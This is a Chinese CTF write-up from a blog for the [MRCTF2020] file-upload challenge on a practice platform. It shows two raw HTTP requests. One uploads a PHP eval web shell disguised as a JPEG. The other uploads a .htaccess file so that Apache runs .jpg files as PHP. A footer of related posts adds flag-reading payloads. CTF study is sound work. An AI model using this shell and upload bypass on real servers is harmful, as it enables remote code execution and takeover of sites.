首页 > 其他分享 >[MRCTF2020]你传你呢

[MRCTF2020]你传你呢

时间:2023-11-01 22:34:29浏览次数:29  
标签:image WebKitFormBoundarypMRMh8WIkigVRbgs buuoj Content application da223b1e7d15 

打开题目如下。
image.png
本题有坑点,就算是使用 mspaint 随意生成一个 jpg 图片进行上传,仍然提示:我扌your problem?。后面查看了 wp,发现是对上传内容的大小存在限制。
经尝试,使用 phpphtmlphp5 等多种后缀都无法绕过检测,但可以上传 .htaccess 文件(.htaccessApache 使用的一种配置文件,可以定义 Apache 对该目录及子目录下的文件的解析方式,如 .jpg 文件可以指定视作 php 文件进行解析。

POST /upload.php HTTP/1.1
Host: 58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypMRMh8WIkigVRbgs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6dc018d803ac639489f503974b105ff7
Connection: close

------WebKitFormBoundarypMRMh8WIkigVRbgs
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<?php
@eval($_POST['cmd']);
?>
------WebKitFormBoundarypMRMh8WIkigVRbgs
Content-Disposition: form-data; name="submit"

一键去世
------WebKitFormBoundarypMRMh8WIkigVRbgs--

POST /upload.php HTTP/1.1
Host: 58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81
Content-Length: 365
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypMRMh8WIkigVRbgs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6dc018d803ac639489f503974b105ff7
Connection: close

------WebKitFormBoundarypMRMh8WIkigVRbgs
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

<IfModule mime_module>
AddType application/x-httpd-php .jpg
</IfModule>
------WebKitFormBoundarypMRMh8WIkigVRbgs
Content-Disposition: form-data; name="submit"

一键去世
------WebKitFormBoundarypMRMh8WIkigVRbgs--

随后根据响应包的内容,找到对应的 jpg 文件,使用蚁剑连接即可。
image.png

标签:image,WebKitFormBoundarypMRMh8WIkigVRbgs,buuoj,Content,application,da223b1e7d15,
From: https://www.cnblogs.com/imtaieee/p/17804300.html

相关文章

  • [MRCTF2020]Ezpop
    原理反序列化解题过程记得tostring的触发方式!还有urlencode只要是通过get请求,参数记得url编码https://blog.csdn.net/pakho_C/article/details/126057111......
  • [MRCTF2020]你传你呢
    原理.htaccess文件解析漏洞以及MIME的修改,注意注意,三种MIME值png,jpg,gif不行的话都要试一遍,不要错过啦--手搓连接木马的系统命令多种使用方式payload:var_dump(scandir('/'));echofile_get_contents('/flag');解题过程进入靶场,让上传文件上传文件抓包,发现包被过......
  • BUUCTF:[MRCTF2020]Ez_bypass
    https://buuoj.cn/challenges#[MRCTF2020]Ez_bypass右键查看源代码include'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])){$id=$_GET['id'];$gg=$_GET......
  • BUUCTF: [MRCTF2020]Ezpop
    https://buuoj.cn/challenges#[MRCTF2020]Ezpop<?phpclassModifier{protected$var;publicfunctionappend($value){include($value);}publicfunction__invoke(){$this->append($this->var);}}classShow{......
  • MISC|[MRCTF2020]Unravel!!
    解压得到三个文件其中有一个音频叫Look_at_the_file_ending.wav,暗示看文件尾部,使用010editor打开发现key,应该是压缩包的解压密码,但是直接试失败key=U2FsdGVkX1/nSQN+hoHL8OwV9iJB/mSdKk5dmusulz4=查看JM.png文件发现尾部有压缩包使用foremost分离得到图片,图片名称为aes......
  • WEB|[MRCTF2020]套娃
    查看网页源码发现代码$query=$_SERVER['QUERY_STRING'];if(substr_count($query,'_')!==0||substr_count($query,'%5f')!=0){die('Y0uareSocutE!');}if($_GET['b_u_p_t']!=='23333'&&am......
  • [MRCTF2020]Transform 1
    查壳:64位,先看看运行有问题吗:任意输入给你弹了一个wrong进IDA看看:解释:输入一个字符串,要满足字符串的长度为33,不然就报错。接下来是在输入的字符串中拿出特定的字符,进行异或后得到一个新的字符串,最后与特定的字符串对比。这样看来,我们先看要对比的字符串:还不短,但是我们只......
  • [MRCTF2020]Ezpop
    1.解题过程1.题目源代码<?php//flagisinflag.php//WTFISTHIS?//LearnFromhttps://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%......
  • [MRCTF2020]Ezaudit
    [MRCTF2020]Ezaudit考点:php的伪随机数好复杂的页面,搜索了一下php、form等可能可以利用的字段无果,然后猜测有备份,果然尝试了一下www.zip,里面有一个index.php<?phpheade......
  • re | [MRCTF2020]VirtualTree
    re|[MRCTF2020]VirtualTree这个题是一个错题,是有多解的。原因是使用了abs函数考察了二叉树后序遍历,和一点基本花指令,还有一点点smc的内容。直接丢exp了:#include<s......